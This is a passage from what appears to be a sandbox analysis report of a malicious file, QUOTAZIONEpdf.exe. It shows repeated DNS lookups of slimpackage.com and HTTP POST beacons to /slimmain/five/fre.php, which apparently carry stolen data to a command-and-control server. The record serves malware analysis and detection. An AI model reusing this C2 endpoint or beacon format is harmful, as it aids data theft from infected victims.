              Jan 14, 2022 09:53:16.526405096 CET | 192.168.2.3 | 8.8.8.8 | 0x6ba7 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:53:18.082562923 CET | 192.168.2.3 | 8.8.8.8 | 0x89d | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:53:19.696553946 CET | 192.168.2.3 | 8.8.8.8 | 0x6477 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:53:21.026103020 CET | 192.168.2.3 | 8.8.8.8 | 0x5995 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:53:22.642846107 CET | 192.168.2.3 | 8.8.8.8 | 0xdc3b | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:53:25.096461058 CET | 192.168.2.3 | 8.8.8.8 | 0xbb7a | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:53:26.482763052 CET | 192.168.2.3 | 8.8.8.8 | 0xe699 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:53:27.923367977 CET | 192.168.2.3 | 8.8.8.8 | 0x9470 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:53:29.277138948 CET | 192.168.2.3 | 8.8.8.8 | 0xc434 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:53:32.222469091 CET | 192.168.2.3 | 8.8.8.8 | 0x2c67 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:53:34.646564960 CET | 192.168.2.3 | 8.8.8.8 | 0x502b | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:53:38.370861053 CET | 192.168.2.3 | 8.8.8.8 | 0x34b2 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:53:42.318813086 CET | 192.168.2.3 | 8.8.8.8 | 0x2d60 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:53:50.238415003 CET | 192.168.2.3 | 8.8.8.8 | 0x9197 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:53:54.120655060 CET | 192.168.2.3 | 8.8.8.8 | 0xb7c1 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:53:56.889389038 CET | 192.168.2.3 | 8.8.8.8 | 0x33b5 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:53:59.456651926 CET | 192.168.2.3 | 8.8.8.8 | 0x9b3c | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:54:01.937850952 CET | 192.168.2.3 | 8.8.8.8 | 0x41cf | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:54:03.356400967 CET | 192.168.2.3 | 8.8.8.8 | 0x48f0 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:54:04.759175062 CET | 192.168.2.3 | 8.8.8.8 | 0x2242 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:54:07.453048944 CET | 192.168.2.3 | 8.8.8.8 | 0xc831 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:54:10.560174942 CET | 192.168.2.3 | 8.8.8.8 | 0x389 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:54:14.424412966 CET | 192.168.2.3 | 8.8.8.8 | 0xd0be | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:54:16.826210022 CET | 192.168.2.3 | 8.8.8.8 | 0x8155 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:54:20.161289930 CET | 192.168.2.3 | 8.8.8.8 | 0xfb07 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:54:22.129714012 CET | 192.168.2.3 | 8.8.8.8 | 0x2293 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:54:24.605570078 CET | 192.168.2.3 | 8.8.8.8 | 0xf44e | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:54:25.971417904 CET | 192.168.2.3 | 8.8.8.8 | 0x85e0 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:54:27.306365967 CET | 192.168.2.3 | 8.8.8.8 | 0x50f2 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:54:28.596005917 CET | 192.168.2.3 | 8.8.8.8 | 0xebb1 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:54:30.029385090 CET | 192.168.2.3 | 8.8.8.8 | 0x1a9a | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:54:31.352067947 CET | 192.168.2.3 | 8.8.8.8 | 0x371e | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:54:32.648261070 CET | 192.168.2.3 | 8.8.8.8 | 0xf39e | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:54:34.090576887 CET | 192.168.2.3 | 8.8.8.8 | 0x1648 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:54:35.436048031 CET | 192.168.2.3 | 8.8.8.8 | 0x4a4b | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)

              DNS Answers

              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
              Jan 14, 2022 09:52:38.657176971 CET | 8.8.8.8 | 192.168.2.3 | 0x73a6 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:52:40.198261976 CET | 8.8.8.8 | 192.168.2.3 | 0x2372 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:52:41.610778093 CET | 8.8.8.8 | 192.168.2.3 | 0x22db | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:52:43.096473932 CET | 8.8.8.8 | 192.168.2.3 | 0x10bc | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:52:44.515840054 CET | 8.8.8.8 | 192.168.2.3 | 0x81aa | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:52:46.248193026 CET | 8.8.8.8 | 192.168.2.3 | 0x43fd | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:52:48.809930086 CET | 8.8.8.8 | 192.168.2.3 | 0xfaa3 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:52:50.185595036 CET | 8.8.8.8 | 192.168.2.3 | 0x44d | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:52:51.680947065 CET | 8.8.8.8 | 192.168.2.3 | 0xade | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:52:53.108489990 CET | 8.8.8.8 | 192.168.2.3 | 0x8db2 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:52:54.534598112 CET | 8.8.8.8 | 192.168.2.3 | 0xc253 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:52:57.081229925 CET | 8.8.8.8 | 192.168.2.3 | 0xc65e | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:52:59.479227066 CET | 8.8.8.8 | 192.168.2.3 | 0xc212 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:53:01.981122017 CET | 8.8.8.8 | 192.168.2.3 | 0x791e | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:53:03.715970993 CET | 8.8.8.8 | 192.168.2.3 | 0x96c6 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:53:06.790982008 CET | 8.8.8.8 | 192.168.2.3 | 0x44e | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:53:08.471786976 CET | 8.8.8.8 | 192.168.2.3 | 0xd242 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:53:10.148004055 CET | 8.8.8.8 | 192.168.2.3 | 0xe5aa | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:53:11.562706947 CET | 8.8.8.8 | 192.168.2.3 | 0x5691 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:53:13.262392044 CET | 8.8.8.8 | 192.168.2.3 | 0x7cc9 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:53:15.010253906 CET | 8.8.8.8 | 192.168.2.3 | 0x7ef9 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:53:16.543914080 CET | 8.8.8.8 | 192.168.2.3 | 0x6ba7 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:53:18.101998091 CET | 8.8.8.8 | 192.168.2.3 | 0x89d | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:53:19.715605974 CET | 8.8.8.8 | 192.168.2.3 | 0x6477 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:53:21.045577049 CET | 8.8.8.8 | 192.168.2.3 | 0x5995 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:53:22.662409067 CET | 8.8.8.8 | 192.168.2.3 | 0xdc3b | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:53:25.115611076 CET | 8.8.8.8 | 192.168.2.3 | 0xbb7a | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:53:26.502017975 CET | 8.8.8.8 | 192.168.2.3 | 0xe699 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:53:27.941533089 CET | 8.8.8.8 | 192.168.2.3 | 0x9470 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:53:29.298034906 CET | 8.8.8.8 | 192.168.2.3 | 0xc434 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:53:32.240061998 CET | 8.8.8.8 | 192.168.2.3 | 0x2c67 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:53:34.666029930 CET | 8.8.8.8 | 192.168.2.3 | 0x502b | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:53:38.389735937 CET | 8.8.8.8 | 192.168.2.3 | 0x34b2 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:53:42.336323023 CET | 8.8.8.8 | 192.168.2.3 | 0x2d60 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:53:50.257669926 CET | 8.8.8.8 | 192.168.2.3 | 0x9197 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:53:54.140160084 CET | 8.8.8.8 | 192.168.2.3 | 0xb7c1 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:53:56.908751011 CET | 8.8.8.8 | 192.168.2.3 | 0x33b5 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:53:59.475377083 CET | 8.8.8.8 | 192.168.2.3 | 0x9b3c | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:54:01.956938028 CET | 8.8.8.8 | 192.168.2.3 | 0x41cf | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:54:03.375410080 CET | 8.8.8.8 | 192.168.2.3 | 0x48f0 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:54:04.778942108 CET | 8.8.8.8 | 192.168.2.3 | 0x2242 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:54:07.472659111 CET | 8.8.8.8 | 192.168.2.3 | 0xc831 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:54:10.580290079 CET | 8.8.8.8 | 192.168.2.3 | 0x389 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:54:14.443897963 CET | 8.8.8.8 | 192.168.2.3 | 0xd0be | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:54:16.845690966 CET | 8.8.8.8 | 192.168.2.3 | 0x8155 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:54:20.180885077 CET | 8.8.8.8 | 192.168.2.3 | 0xfb07 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:54:22.149153948 CET | 8.8.8.8 | 192.168.2.3 | 0x2293 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:54:24.624635935 CET | 8.8.8.8 | 192.168.2.3 | 0xf44e | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:54:25.991489887 CET | 8.8.8.8 | 192.168.2.3 | 0x85e0 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:54:27.325659990 CET | 8.8.8.8 | 192.168.2.3 | 0x50f2 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:54:28.613475084 CET | 8.8.8.8 | 192.168.2.3 | 0xebb1 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:54:30.048664093 CET | 8.8.8.8 | 192.168.2.3 | 0x1a9a | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:54:31.371239901 CET | 8.8.8.8 | 192.168.2.3 | 0x371e | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:54:32.668024063 CET | 8.8.8.8 | 192.168.2.3 | 0xf39e | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:54:34.109834909 CET | 8.8.8.8 | 192.168.2.3 | 0x1648 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
              Jan 14, 2022 09:54:35.455698967 CET | 8.8.8.8 | 192.168.2.3 | 0x4a4b | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)

              HTTP Request Dependency Graph

              • slimpackage.com

              HTTP Packets

              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              0 | 192.168.2.3 | 49742 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:52:38.800709009 CET | 1104 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 190
              Connection: close
              Jan 14, 2022 09:52:39.061507940 CET | 1105 | IN | HTTP/1.1 404 Not Found
              Date: Fri, 14 Jan 2022 08:52:37 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              1 | 192.168.2.3 | 49743 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:52:40.325541973 CET | 1106 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 190
              Connection: close
              Jan 14, 2022 09:52:40.603960991 CET | 1106 | IN | HTTP/1.1 404 Not Found
              Date: Fri, 14 Jan 2022 08:52:39 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              10 | 192.168.2.3 | 49752 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:52:54.669015884 CET | 1121 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:52:54.926312923 CET | 1122 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:52:53 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              11 | 192.168.2.3 | 49755 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:52:57.212577105 CET | 1145 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:52:57.467825890 CET | 1146 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:52:56 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              12 | 192.168.2.3 | 49756 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:52:59.611439943 CET | 1147 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:52:59.868741035 CET | 1147 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:52:58 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              13 | 192.168.2.3 | 49757 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:53:02.120827913 CET | 1148 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:02.376370907 CET | 1149 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:01 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              14 | 192.168.2.3 | 49758 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:53:03.980417013 CET | 1149 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:04.236856937 CET | 1150 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:03 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              15 | 192.168.2.3 | 49759 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:53:06.924773932 CET | 1151 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:07.233124971 CET | 1151 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:06 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              16 | 192.168.2.3 | 49760 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:53:08.606764078 CET | 1152 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:08.864233971 CET | 1153 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:07 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              17 | 192.168.2.3 | 49761 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:53:10.307977915 CET | 1154 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:10.631426096 CET | 1154 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:09 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              18 | 192.168.2.3 | 49762 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:53:11.692209005 CET | 1155 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:11.946695089 CET | 1156 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:10 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              19 | 192.168.2.3 | 49763 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:53:13.390691996 CET | 1156 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:13.657711029 CET | 1157 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:12 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              2 | 192.168.2.3 | 49744 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:52:41.740730047 CET | 1107 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:52:41.998064995 CET | 1108 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:52:40 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              20 | 192.168.2.3 | 49764 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:53:15.147551060 CET | 1158 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:15.406161070 CET | 1158 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:14 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              21 | 192.168.2.3 | 49765 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:53:16.674288988 CET | 1159 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:16.934175968 CET | 1160 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:15 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
